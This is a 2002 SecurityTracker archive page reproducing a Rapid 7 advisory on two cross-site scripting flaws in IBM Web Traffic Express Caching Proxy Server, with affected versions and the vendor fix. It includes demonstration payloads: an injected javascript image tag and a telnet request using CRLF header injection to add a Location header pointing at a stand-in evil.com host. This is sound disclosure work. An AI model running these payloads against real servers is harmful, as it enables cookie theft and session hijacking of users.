Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
IBM Web Traffic Express Caching Proxy Server Allows Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1005472 |
|
CVE Reference: CAN-2002-1167
, CAN-2002-1168
(Links to External Site)
|
Date: Oct 23 2002
|
Impact: User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Advisory: Rapid 7
|
Version(s): 3.6, 4.x
|
Description: Some input validation flaws were reported in the IBM Web Traffic Express Caching Proxy Server. A remote user can conduct cross-site scripting attacks against proxy users.
Rapid 7 issued an advisory warning of two cross-site scripting flaws. A remote user can create a specially crafted URL that, when
loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate
from the proxy server and will run in the security context of that site. As a result, the code will be able to access the target
user's cookies (including authentication cookies), if any, associated with the proxy server, access data recently submitted by the
target user via web form to the server, or take actions on the server acting as the target user. A demonstration exploit is provided:
/"><img%20src="javascript:alert(document.domain)">
A remote user can also add a second "Location:" header by using %0a%0d,
as shown below:
telnet [victim server] 80
Trying 192.168.100.1...
Connected to [victim server].
Escape character
is '^]'.
GET
/%0a%0dLocation:%20http://[evil server]/"><img%20src="javascript:alert(document.domain)">
HTTP/1.0
|
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the
vulnerable software, access data recently submitted by the target user via web form to the site, or take actions on the site acting
as the target user.
|
Solution: The vendor has released efix build number 4.0.1.26 for Caching Proxy Server v4.x. (see APAR# IY24527 and APAR# IY35139)
Users
can install Caching Proxy efix build 4.0.1.26 or higher. Users running v3.6 should contact IBM support for more information on how
to upgrade to a newer build.
|
Vendor URL: www-3.ibm.com/software/webservers/wte/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (AIX), UNIX (Solaris - SunOS), Windows (NT)
|
Reported By: "Rapid 7 Security Advisories" <advisory@rapid7.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 23 Oct 2002 12:16:08 -0700
From: "Rapid 7 Security Advisories" <advisory@rapid7.com>
Subject: [VulnWatch] R7-0008: IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Rapid 7, Inc. Security Advisory
Visit http://www.rapid7.com/ to download NeXpose(tm), our
advanced vulnerability scanner. Linux and Windows 2000
versions are available now!
_______________________________________________________________________
Rapid 7 Advisory R7-0008
IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues
Published: October 23, 2002
Revision: 1.0
http://www.rapid7.com/advisories/R7-0008.txt
o First XSS issue (standard XSS)
IBM: APAR# IY24527
CVE: CAN-2002-1167
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1167
Bugtraq: 6000
http://online.securityfocus.com/bid/6000
o Second XSS issue (HTTP header injection)
IBM: APAR# IY35139
CVE: CAN-2002-1168
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1168
Bugtraq: 6001
http://online.securityfocus.com/bid/6001
1. Affected system(s):
KNOWN VULNERABLE:
o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
with IBM WebSphere Edge Server v2.0)
o IBM Web Traffic Express Caching Proxy Server v3.6
2. Summary
IBM Web Traffic Express Caching Proxy server is vulnerable to
cross site scripting. The Caching Proxy server allows script code
to be injected into pages using standard cross-site scripting
techniques. A second, variant attack allows the HTTP headers to
be manipulated.
IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
v2.0. IBM Web Traffic Express v3.6 and earlier were separately
shipping products.
3. Vendor status and information
IBM Software
http://www-3.ibm.com/software/webservers/edgeserver/index.html
IBM was notified of this issue and has released efix build number
4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue
and other security issues (see Rapid 7 advisory R7-0007 for more
information: http://www.rapid7.com/advisories/R7-0007.txt ).
IBM is tracking the first (standard) XSS issue as APAR# IY24527.
IBM is tracking the second (header injection) XSS issue as
APAR# IY35139.
4. Solution
IBM customers should install Caching Proxy efix build 4.0.1.26 or
higher. Efix builds can be downloaded from IBM's secure FTP site.
For more information on obtaining efix builds, contact IBM support
with the APAR numbers listed above.
The fixes have also been ported back to the Web Traffic Express v3.6
code base. Customers running v3.6 should contact IBM support for
more information on how to upgrade to a newer build.
5. Detailed analysis
There are two XSS techniques that can be used against the caching
proxy server. Please note that the following text may be
wrapped or otherwise mangled by mail clients or gateways. You
should refer to the original advisory if there is a question about
the exact text.
a) Standard XSS exploit against Web Traffic Express Caching Proxy
Request the following path from the caching proxy server:
/"><img%20src="javascript:alert(document.domain)">
b) XSS exploit against Web Traffic Express Caching Proxy, adding a
second "Location:" header by using %0a%0d
telnet www.victim.com 80
Trying 192.168.100.1...
Connected to www.victim.com.
Escape character is '^]'.
GET
/%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert(document.domain
)">
HTTP/1.0
HTTP/1.1 302 Found
Server: IBM-PROXY-WTE-US/3.6
Date: Fri, 18 Oct 2002 03:44:18 GMT
Location: http://www.victim.com/;www.victim.com/
Location: http:/www.evil.com/<img
src="javascript:alert(document.domain)">
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 443
Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT
...
6. Contact Information
Rapid 7 Security Advisories
Email: advisory@rapid7.com
Web: http://www.rapid7.com/
Phone: +1 (212) 558-8700
7. Disclaimer and Copyright
Rapid 7, Inc. is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service
to the professional security community. There are NO WARRANTIES
with regard to this information. Any application or distribution of
this information constitutes acceptance AS IS, at the user's own
risk. This information is subject to change without notice.
This advisory Copyright (C) 2002 Rapid 7, Inc. Permission is
hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers
remain intact.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (OpenBSD)
iD8DBQE9tuwTcL76DCfug6wRAjNRAJ4qMUKne/vS+7k41XXYKS0wZ4PBFwCfdl8J
+BWWNXDgIxkFJT1tiKzaHW4=
=icsO
-----END PGP SIGNATURE-----
|
|
Go to the Top of This SecurityTracker Archive Page
|
